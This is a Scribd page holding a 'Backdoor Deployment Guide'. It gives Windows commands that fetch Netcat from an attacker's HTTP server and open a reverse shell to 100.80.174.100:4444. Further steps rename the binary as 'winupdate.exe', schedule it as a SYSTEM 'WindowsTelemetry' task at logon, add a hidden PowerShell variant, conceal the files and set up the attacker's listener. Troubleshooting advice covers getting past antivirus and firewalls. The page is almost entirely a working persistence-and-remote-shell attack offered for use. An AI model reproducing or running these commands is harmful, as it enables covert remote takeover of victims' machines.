Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
6 views2 pages

Backdoor Deployment Guide

This document provides a step-by-step guide for deploying a backdoor using Netcat on a target machine. It includes instructions for uploading the binary, creating a persistent connection, and setting up a scheduled task for execution. Additionally, it offers troubleshooting tips to ensure successful deployment and connection.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
6 views2 pages

Backdoor Deployment Guide

This document provides a step-by-step guide for deploying a backdoor using Netcat on a target machine. It includes instructions for uploading the binary, creating a persistent connection, and setting up a scheduled task for execution. Additionally, it offers troubleshooting tips to ensure successful deployment and connection.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Backdoor Deployment and Connection Guide

Step 1: Upload Netcat binary to target machine

curl http://100.80.174.100:8000/nc.exe -o C:\Windows\Temp\nc.exe

This command uses curl to download the Netcat executable from the attacker's Python HTTP server

and saves it in a writable directory on the victim's machine.

Step 2: Test the binary works

C:\Windows\Temp\nc.exe 100.80.174.100 4444 -e cmd.exe

This command starts a reverse shell from the victim to the attacker at 100.80.174.100 on port 4444

using cmd.exe.

Step 3: Move Netcat and create a persistent batch script

move C:\Windows\Temp\nc.exe C:\ProgramData\winupdate.exe

echo C:\ProgramData\winupdate.exe 100.80.174.100 4444 -e cmd.exe >

C:\ProgramData\updater.bat

This moves the Netcat binary to a hidden location and creates a batch file that starts it.

Step 4: Create a persistent scheduled task

schtasks /create /tn "WindowsTelemetry" /tr "C:\ProgramData\updater.bat" /sc onlogon /ru SYSTEM

This creates a scheduled task that runs at system logon as SYSTEM.

Step 5: Optional PowerShell version for stealth and encoding

Set-Content -Path "C:\ProgramData\winupdate.ps1" -Value "$c=New-Object

Net.Sockets.TCPClient(...);"

schtasks /change /tn "WindowsTelemetry" /tr "powershell -w hidden -nop -file

C:\ProgramData\winupdate.ps1"

This version replaces the batch file with a PowerShell script for stealth and encodes the command.

Step 6: Hide backdoor files

attrib +h +s C:\ProgramData\winupdate.exe
attrib +h +s C:\ProgramData\winupdate.ps1

These commands hide the files by marking them hidden and system attributes.

Step 7: Manually trigger or test the backdoor

schtasks /run /tn "WindowsTelemetry"

Or manually run:

C:\ProgramData\winupdate.exe 100.80.174.100 4444 -e cmd.exe

This forces immediate execution to test the connection.

Step 8: Attacker listener setup

nc -lvnp 4444

This command on the attacker's Linux machine listens for incoming reverse shell connections.

Troubleshooting tips

- Ensure your IP is reachable from victim (check firewall/VPN).

- Make sure the port (4444) is not blocked.

- Re-upload the nc.exe if antivirus deleted it.

- Check scheduled task path is correct.

- Run the scheduled task manually to test.

You might also like